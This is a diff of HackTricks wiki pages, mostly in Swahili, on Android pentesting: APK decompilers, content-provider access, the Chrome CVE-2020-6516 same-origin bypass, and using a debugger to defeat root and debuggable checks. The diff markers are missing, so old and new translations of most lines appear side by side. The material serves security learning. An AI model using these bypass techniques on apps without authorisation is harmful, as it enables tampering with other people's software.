Pamoja na **Bytecode-Viewer**, unaweza kuchambua faili za APK kwa kutumia decompilers kadhaa. Baada ya kupakua, endesha Bytecode-Viewer, pakua APK yako, na chagua decompilers unazotaka kutumia kwa uchambuzi wa pamoja.
### [Enjarify](https://github.com/Storyyeller/enjarify)
**Enjarify** inabadilisha bytecode ya Dalvik kuwa bytecode ya Java, kuruhusu zana za uchambuzi wa Java kuchambua programu za Android kwa ufanisi zaidi.
**Enjarify** inatafsiri Dalvik bytecode kuwa Java bytecode, ikiruhusu zana za uchambuzi wa Java kuchambua programu za Android kwa ufanisi zaidi.
- Ili kutumia Enjarify, tekeleza: `enjarify app.apk`
Hii inazalisha bytecode ya Java inayolingana na APK iliyotolewa.
- Ili kutumia Enjarify, endesha: `enjarify app.apk`
Hii inazalisha Java bytecode sawa na APK iliyotolewa.
### [CFR](https://github.com/leibnitz27/cfr)
**CFR** inaweza kudecompile vipengele vya kisasa vya Java. Tumia kama ifuatavyo:
**CFR** ina uwezo wa decompiling vipengele vya kisasa vya Java. Tumia kama ifuatavyo:
- Kwa kudecompile kawaida: `java -jar ./cfr.jar "app.jar" --outputdir "saraka_ya_pato"`
- Kwa faili kubwa za JAR, rekebisha ugawaji wa kumbukumbu ya JVM: `java -Xmx4G -jar ./cfr.jar "app.jar" --outputdir "saraka_ya_pato"`
- Kwa decompilation ya kawaida: `java -jar ./cfr.jar "app.jar" --outputdir "output_directory"`
- Kwa faili kubwa za JAR, rekebisha ugawaji wa kumbukumbu ya JVM: `java -Xmx4G -jar ./cfr.jar "app.jar" --outputdir "output_directory"`
### [Fernflower](https://github.com/JetBrains/intellij-community/tree/master/plugins/java-decompiler/engine)
**Fernflower**, decompiler ya uchambuzi, inahitaji kujengwa kutoka chanzo. Baada ya kujenga:
**Fernflower**, decompiler wa uchambuzi, inahitaji kujengwa kutoka chanzo. Baada ya kujenga:
- Kudecompile faili ya JAR: `java -jar ./fernflower.jar "app.jar" "saraka_ya_pato"`
Kisha, chukua faili za `.java` kutoka kwenye JAR iliyozalishwa kwa kutumia `unzip`.
- Decompile faili ya JAR: `java -jar ./fernflower.jar "app.jar" "output_directory"`
Kisha, toa faili za `.java` kutoka kwa JAR iliyozalishwa kwa kutumia `unzip`.
### [Krakatau](https://github.com/Storyyeller/Krakatau)
**Krakatau** inatoa udhibiti wa kina juu ya kudecompile, haswa kwa kushughulikia maktaba za nje.
**Krakatau** inatoa udhibiti wa kina juu ya decompilation, hasa kwa kushughulikia maktaba za nje.
- Tumia Krakatau kwa kubainisha njia ya maktaba ya kawaida na faili ya JAR ya kudecompile: `./Krakatau/decompile.py -out "saraka_ya_pato" -skip -nauto -path "./jrt-extractor/rt.jar" "app.jar"`
- Tumia Krakatau kwa kubainisha njia ya maktaba ya kawaida na faili ya JAR ya decompile: `./Krakatau/decompile.py -out "output_directory" -skip -nauto -path "./jrt-extractor/rt.jar" "app.jar"`
### [procyon](https://github.com/mstrobel/procyon)
Kwa kudecompile rahisi na **procyon**:
Kwa decompilation rahisi na **procyon**:
- Kudecompile faili ya JAR kwenye saraka iliyoainishwa: `procyon -jar "app.jar" -o "saraka_ya_pato"`
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
- Decompile faili ya JAR kwenye saraka iliyobainishwa: `procyon -jar "app.jar" -o "output_directory"`

64
mobile-pentesting/android-app-pentesting/content-protocol.md
View file

@ -1,16 +1,17 @@
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
@ -18,21 +19,21 @@ Njia nyingine za kusaidia HackTricks:
**Hii ni muhtasari wa chapisho [https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/)**
### Orodha ya Faili katika Hifadhi ya Media
Ili kuorodhesha faili zinazosimamiwa na Hifadhi ya Media, amri ifuatayo inaweza kutumika:
### Kuorodhesha Faili katika Media Store
Ili kuorodhesha faili zinazodhibitiwa na Media Store, amri iliyo hapa chini inaweza kutumika:
```bash
$ content query --uri content://media/external/file
```
Kwa matokeo yanayoeleweka zaidi na ya kirafiki kwa binadamu, onyesha tu kitambulisho na njia ya kila faili iliyohifadhiwa:
Ili kupata matokeo rafiki kwa binadamu, kuonyesha tu kitambulisho na njia ya kila faili iliyoorodheshwa:
```bash
$ content query --uri content://media/external/file --projection _id,_data
```
Content providers wamejitosheleza katika eneo lao binafsi la jina. Upatikanaji wa mtoa huduma unahitaji URI maalum ya `content://`. Taarifa kuhusu njia za kupata mtoa huduma zinaweza kupatikana kutoka kwa mizizi ya maombi au msimbo wa chanzo wa Android.
Watoa maudhui wamejengwa katika eneo lao la kibinafsi. Upatikanaji wa mtoa huduma unahitaji URI maalum ya `content://`. Taarifa kuhusu njia za kufikia mtoa huduma zinaweza kupatikana kutoka kwa hati za programu au msimbo wa chanzo wa mfumo wa Android.
### Upatikanaji wa Chrome kwa Watoa Huduma wa Yaliyomo
Chrome kwenye Android inaweza kupata watoa huduma wa yaliyomo kupitia mpango wa `content://`, kuruhusu kupata rasilimali kama picha au nyaraka zilizosafirishwa na programu za watu wa tatu. Ili kufafanua hili, faili inaweza kuingizwa kwenye Hifadhi ya Vyombo vya Habari na kisha kupatikana kupitia Chrome:
### Upatikanaji wa Chrome kwa Watoa Maudhui
Chrome kwenye Android inaweza kufikia watoa maudhui kupitia mpango wa `content://`, ikiruhusu kufikia rasilimali kama picha au hati zilizotolewa na programu za wahusika wengine. Ili kuonyesha hili, faili inaweza kuingizwa kwenye Duka la Media na kisha kufikiwa kupitia Chrome:
Ingiza kuingia desturi kwenye Hifadhi ya Vyombo vya Habari:
Ingiza kipengee maalum kwenye Duka la Media:
```bash
cd /sdcard
echo "Hello, world!" > test.txt
@ -40,27 +41,27 @@ content insert --uri content://media/external/file \
--bind _data:s:/storage/emulated/0/test.txt \
--bind mime_type:s:text/plain
```
Pata kitambulisho cha faili iliyowekwa hivi karibuni:
Gundua kitambulisho cha faili mpya iliyoongezwa:
```bash
content query --uri content://media/external/file \
--projection _id,_data | grep test.txt
# Output: Row: 283 _id=747, _data=/storage/emulated/0/test.txt
```
Faili hiyo inaweza kisha kuonekana kwenye Chrome kwa kutumia URL iliyojengwa na kitambulisho cha faili.
Ili faili liweze kuonyeshwa kwenye Chrome, tumia URL iliyoundwa na kitambulisho cha faili.
Kwa mfano, kuorodhesha faili zinazohusiana na programu maalum:
Kwa mfano, ili kuorodhesha faili zinazohusiana na programu maalum:
```bash
content query --uri content://media/external/file --projection _id,_data | grep -i <app_name>
```
### Chrome CVE-2020-6516: Kupuuza Sera ya Asili-Sawa
### Chrome CVE-2020-6516: Same-Origin-Policy Bypass
_Sera ya Asili-Sawa_ (SOP) ni itifaki ya usalama katika vivinjari ambayo inazuia kurasa za wavuti kuingiliana na rasilimali kutoka asili tofauti isipokuwa imeidhinishwa wazi na sera ya Kuvuka-Mwanzo-Mzazi (CORS). Sera hii inalenga kuzuia uvujaji wa habari na udanganyifu wa ombi la kurasa kati ya tovuti. Chrome inachukulia `content://` kama mpango wa ndani, ikimaanisha sheria kali za SOP, ambapo kila URL ya mpango wa ndani inachukuliwa kama asili tofauti.
The _Same Origin Policy_ (SOP) ni itifaki ya usalama katika vivinjari inayopunguza kurasa za wavuti kutoka kuingiliana na rasilimali kutoka vyanzo tofauti isipokuwa ikiruhusiwa wazi na sera ya Cross-Origin-Resource-Sharing (CORS). Sera hii inalenga kuzuia uvujaji wa taarifa na udanganyifu wa maombi ya tovuti tofauti. Chrome inachukulia `content://` kama mpango wa ndani, ikimaanisha sheria za SOP kali, ambapo kila URL ya mpango wa ndani inachukuliwa kama chanzo tofauti.
Hata hivyo, CVE-2020-6516 ilikuwa udhaifu katika Chrome ulioruhusu kupuuza sheria za SOP kwa rasilimali zilizopakiwa kupitia URL ya `content://`. Kwa athari, msimbo wa JavaScript kutoka URL ya `content://` ulikuwa na uwezo wa kupata rasilimali nyingine zilizopakiwa kupitia URL za `content://`, ambayo ilikuwa wasiwasi mkubwa wa usalama, hasa kwenye vifaa vya Android vinavyotumia toleo kabla ya Android 10, ambapo uhifadhi uliolengwa haukuwa umetekelezwa.
Hata hivyo, CVE-2020-6516 ilikuwa udhaifu katika Chrome ambao uliruhusu kupita sheria za SOP kwa rasilimali zilizopakiwa kupitia URL ya `content://`. Kwa hivyo, msimbo wa JavaScript kutoka URL ya `content://` ungeweza kufikia rasilimali nyingine zilizopakiwa kupitia URL za `content://`, ambayo ilikuwa wasiwasi mkubwa wa usalama, hasa kwenye vifaa vya Android vinavyotumia toleo la kabla ya Android 10, ambapo uhifadhi wa kiwango haukuwekwa.
Uthibitisho wa dhana hapo chini unaonyesha udhaifu huu, ambapo hati ya HTML, baada ya kupakiwa chini ya **/sdcard** na kuongezwa kwenye Hifadhi ya Vyombo vya Habari, inatumia `XMLHttpRequest` katika JavaScript yake kupata na kuonyesha maudhui ya faili nyingine kwenye Hifadhi ya Vyombo vya Habari, kwa kupuuza sheria za SOP.
The proof-of-concept below demonstrates this vulnerability, where an HTML document, after being uploaded under **/sdcard** and added to the Media Store, uses `XMLHttpRequest` in its JavaScript to access and display the contents of another file in the Media Store, bypassing the SOP rules.
Uthibitisho wa Dhana wa HTML:
Proof-of-Concept HTML:
```xml
<html>
<head>
@ -93,16 +94,17 @@ xhr.send();
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

135
mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md
View file

@ -1,85 +1,110 @@
# Kudukua programu inayoweza kudebugiwa
# Exploiting a debuggeable application
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# **Kudukua ukaguzi wa root na uwezo wa kudebugiwa**
# **Bypassing root and debuggeable checks**
Sehemu hii ya chapisho ni muhtasari kutoka chapisho [**https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0**](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0)
Sehemu hii ya chapisho ni muhtasari kutoka kwa chapisho [**https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0**](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0)
## Hatua za Kufanya Programu ya Android Iweze Kudebugiwa na Kudukua Ukaguzi
## Steps to Make an Android App Debuggable and Bypass Checks
### **Kufanya Programu Iweze Kudebugiwa**
### **Making the App Debuggable**
Yaliyomo yamechukuliwa kutoka https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0
Maudhui yanategemea https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0
1. **Kudondoa APK:**
- Tumia zana ya APK-GUI kudondoa APK.
- Katika faili ya _android-manifest_, ingiza `android:debuggable=true` kuwezesha hali ya kudebugiwa.
- Dondoa tena, saini, na zipalign programu iliyobadilishwa.
1. **Decompile the APK:**
- Tumia zana ya APK-GUI kwa ajili ya decompiling APK.
- Katika faili _android-manifest_, weka `android:debuggable=true` ili kuwezesha hali ya debugging.
- Recompile, sign, na zipalign programu iliyobadilishwa.
2. **Sakinisha Programu Iliyobadilishwa:**
- Tumia amri: `adb install <jina_la_programu>`.
2. **Install the Modified Application:**
- Tumia amri: `adb install <application_name>`.
3. **Pata Jina la Pakiti:**
- Tekeleza `adb shell pm list packages 3` kuorodhesha programu za watu wengine na kupata jina la pakiti.
3. **Retrieve the Package Name:**
- Tekeleza `adb shell pm list packages 3` ili orodhesha programu za wahusika wengine na kupata jina la kifurushi.
4. **Weka Programu Iwe Ngoja Uunganisho wa Kudebugiwa:**
- Amri: `adb shell am setup-debug-app w <jina_la_pakiti>`.
- **Kumbuka:** Amri hii lazima itekelezwe kila wakati kabla ya kuanza programu ili kuhakikisha inangoja kudebugiwa.
- Kwa uthabiti, tumia `adb shell am setup-debug-app w -persistent <jina_la_pakiti>`.
- Ili kuondoa alama zote, tumia `adb shell am clear-debug-app <jina_la_pakiti>`.
4. **Set the App to Await Debugger Connection:**
- Amri: `adb shell am setup-debug-app w <package_name>`.
- **Kumbuka:** Amri hii lazima ifanywe kila wakati kabla ya kuanzisha programu ili kuhakikisha inasubiri debugger.
- Kwa kudumu, tumia `adb shell am setup-debug-app w -persistent <package_name>`.
- Kuondoa bendera zote, tumia `adb shell am clear-debug-app <package_name>`.
5. **Jitayarisha kwa Kudebugiwa kwenye Android Studio:**
- Nenda kwenye Android Studio kwa kubonyeza _File -> Open Profile or APK_.
- Fungua APK iliyobadilishwa.
5. **Prepare for Debugging in Android Studio:**
- Tembea katika Android Studio hadi _File -> Open Profile or APK_.
- Fungua APK iliyorekebishwa.
6. **Weka Alama za Kusimamisha katika Faili za Java muhimu:**
- Weka alama za kusimamisha katika `MainActivity.java` (hasa katika njia ya `onCreate`), `b.java`, na `ContextWrapper.java`.
6. **Set Breakpoints in Key Java Files:**
- Weka breakpoints katika `MainActivity.java` (hasa katika njia ya `onCreate`), `b.java`, na `ContextWrapper.java`.
### **Kudukua Ukaguzi**
### **Bypassing Checks**
Programu, katika maeneo fulani, itathibitisha ikiwa inaweza kudebugiwa na pia itafanya ukaguzi wa faili za binary zinazoonyesha kifaa kilichorootiwa. Kudebugiwa kunaweza kutumika kubadilisha habari za programu, kufuta biti ya kudebugiwa, na kubadilisha majina ya faili za binary zinazotafutwa ili kudukua ukaguzi huu.
Programu, katika hatua fulani, itathibitisha ikiwa inapatikana kwa debugging na pia itakagua binaries zinazoashiria kifaa kilichoshikiliwa. Debugger inaweza kutumika kubadilisha taarifa za programu, kuondoa kipande cha debuggable, na kubadilisha majina ya binaries yanayotafutwa ili kupita hizi checks.
Kwa ukaguzi wa kudebugiwa:
Kwa ajili ya ukaguzi wa debuggable:
1. **Badilisha Mipangilio ya Alama:**
- Katika sehemu ya mchanganyiko wa konsoli ya kudebugi, nenda kwenye: `this mLoadedAPK -> mApplicationInfo -> flags = 814267974`.
- **Kumbuka:** Uwakilishi wa binary wa `flags = 814267974` ni `11000011100111011110`, ikionyesha kuwa "Flag_debuggable" iko hai.
1. **Modify Flag Settings:**
- Katika sehemu ya mabadiliko ya debugger console, tembea hadi: `this mLoadedAPK -> mApplicationInfo -> flags = 814267974`.
- **Kumbuka:** Uwiano wa binary wa `flags = 814267974` ni `11000011100111011110`, ikionyesha kuwa "Flag_debuggable" inafanya kazi.
![https://miro.medium.com/v2/resize:fit:1400/1*-ckiSbWGSoc1beuxxpKbow.png](https://miro.medium.com/v2/resize:fit:1400/1*-ckiSbWGSoc1beuxxpKbow.png)
Hatua hizi zinahakikisha kuwa programu inaweza kudebugiwa na ukaguzi fulani wa usalama unaweza kudukuliwa kwa kutumia kudebugi, kurahisisha uchambuzi au ubadilishaji wa kina wa tabia ya programu.
Hatua hizi kwa pamoja zinahakikisha kuwa programu inaweza kudebugiwa na kwamba ukaguzi fulani wa usalama unaweza kupitishwa kwa kutumia debugger, ikiruhusu uchambuzi wa kina au mabadiliko ya tabia ya programu.
Hatua ya 2 inahusisha kubadilisha thamani ya alama kuwa 814267972, ambayo inawakilishwa kwa binary kama 110000101101000000100010100.
Hatua ya 2 inahusisha kubadilisha thamani ya bendera kuwa 814267972, ambayo inawakilishwa kwa binary kama 110000101101000000100010100.
# **Kudukua Udhaifu**
# **Exploiting a Vulnerability**
Onyesho lilifanywa kwa kutumia programu yenye udhaifu ambayo ina kifungo na maandishi. Awali, programu inaonyesha "Crack Me". Lengo ni kubadilisha ujumbe kutoka "Try Again" hadi "Hacked" wakati wa muda wa uendeshaji, bila kubadilisha msimbo wa chanzo.
Uonyeshaji ulitolewa kwa kutumia programu yenye udhaifu inayojumuisha kitufe na textview. Kwanza, programu inaonyesha "Crack Me". Lengo ni kubadilisha ujumbe kutoka "Try Again" kuwa "Hacked" wakati wa utendaji, bila kubadilisha msimbo wa chanzo.
## **Kuangalia Udhaifu**
- Programu ilidondolewa kwa kutumia `apktool` ili kupata faili ya `AndroidManifest.xml`.
- Kuwepo kwa `android_debuggable="true"` katika AndroidManifest.xml kunamaanisha programu inaweza kudebugiwa na inaweza kudukuliwa.
- Ni muhimu kutambua kuwa `apktool` inatumika tu kuangalia hali ya kudebugiwa bila kubadilisha msimbo wowote.
## **Checking for Vulnerability**
- Programu ilitolewa kwa kutumia `apktool` ili kufikia faili ya `AndroidManifest.xml`.
- Uwepo wa `android_debuggable="true"` katika AndroidManifest.xml inaonyesha kuwa programu inapatikana kwa debugging na inaweza kuathiriwa.
- Inafaa kutambua kuwa `apktool` inatumika pekee kuangalia hali ya debuggable bila kubadilisha msimbo wowote.
## **Kujiandaa kwa Usanidi**
- Mchakato ulihusisha kuanzisha emulator, kusakinisha programu yenye udhaifu, na kutumia `adb jdwp` kutambua bandari za Dalvik VM zinazosikiliza.
- JDWP (Java Debug Wire Protocol) inaruhusu kudebugiwa kwa programu inayotumika kwenye VM kwa kufunua bandari ya kipekee.
- Uhamishaji wa bandari ulikuwa muhimu kwa kudebugiwa kwa mbali, ikifuatiwa na kuunganisha JDB kwenye programu lengwa.
## **Preparing the Setup**
- Mchakato ulijumuisha kuanzisha emulator, kufunga programu yenye udhaifu, na kutumia `adb jdwp` ili kubaini bandari za Dalvik VM zinazot listening.
- JDWP (Java Debug Wire Protocol) inaruhusu debugging ya programu inayotembea katika VM kwa kufichua bandari ya kipekee.
- Kuelekeza bandari ilikuwa muhimu kwa ajili ya debugging ya mbali, ikifuatiwa na kuunganisha JDB kwenye programu lengwa.
## **Kuingiza Kanuni Wakati wa Muda wa Uendeshaji**
- Udanganyifu ulifanywa kwa kuweka alama za kusimamisha na kudhibiti mtiririko wa programu.
- Amri kama `classes` na `methods <jina_la_darasa>` zilitumika kufunua muundo wa programu.
- Alama ya kusimamisha ilowekwa kwenye njia ya `onClick`, na utekelezaji wake ulidhibitiwa.
- Am
## **Injecting Code at Runtime**
- Utekelezaji ulifanywa kwa kuweka breakpoints na kudhibiti mtiririko wa programu.
- Amri kama `classes` na `methods <class_name>` zilitumika kufichua muundo wa programu.
- Breakpoint ilipangwa katika njia ya `onClick`, na utekelezaji wake ulidhibitiwa.
- Amri za `locals`, `next`, na `set` zilitumika kukagua na kubadilisha mabadiliko ya ndani, hasa kubadilisha ujumbe wa "Try Again" kuwa "Hacked".
- Msimbo uliobadilishwa ulitekelezwa kwa kutumia amri ya `run`, ikibadilisha matokeo ya programu kwa wakati halisi.
Mfano huu ulionyesha jinsi tabia ya programu inayopatikana kwa debugging inaweza kubadilishwa, ikionyesha uwezekano wa udanganyifu zaidi wa hali kama kupata ufikiaji wa shell kwenye kifaa katika muktadha wa programu.
## References
* [https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0)
* [https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

270
mobile-pentesting/android-app-pentesting/frida-tutorial/README.md
View file

@ -1,34 +1,35 @@
# Mafunzo ya Frida
# Frida Tutorial
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
